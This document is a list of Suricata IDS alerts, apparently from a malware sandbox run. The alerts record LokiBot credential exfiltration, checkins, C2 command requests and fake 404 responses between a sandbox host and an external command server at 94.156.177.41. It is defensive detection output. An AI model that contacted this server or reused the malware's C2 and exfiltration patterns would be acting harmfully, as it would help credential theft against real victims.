                    Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49735 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49791 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49791 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49773 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49771 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49766 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49743 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49767 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49773 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49773 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49773 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49767 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49768 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49740
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49749
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49828 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49742
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49745 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49745 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49810 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49810 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49828 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49773 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49760
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49828 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49759
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49828 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49793 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49828 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49793 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49793 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49791
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49793 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49793 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49774
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49743
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49766
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49780 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49778 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49778 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49778 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49756
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49739
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49758
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49778 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49779 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49754
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49779 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49779 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49744
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49741
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49781 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49781 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49781 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49789 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49778 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49770 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49816
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49781 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49779 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49781 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49770 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49746 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49793
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49828
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49810
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49776 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49776 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49776 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49745
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49773
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49746 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49796 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49746 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49768
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49761
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49789 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49789 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49796 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49779 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49796 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49843 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49770 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49775 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49796 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49776 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49767
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49776 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49789 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49746 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49775 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49775 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49770 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49770 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49796 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49775 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49775 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49771
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49746 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49765 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49843 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49794 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49780
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49888 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49765 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49888 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49765 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49794 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49794 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49843 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49765 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49888 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49765 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49777 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49794 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49794 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49822 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49822 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49843 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49843 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49888 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49778
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49789 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49822 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49792 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49792 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49792 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49777 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49803 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49803 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49775
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49777 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49822 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49803 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49822 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49779
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49796
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49888 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49762
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49803 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49803 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49782 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49782 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49782 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49792 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49792 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49781
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49777 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49777 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49804 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49804 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49804 -> 94.156.177.41:80
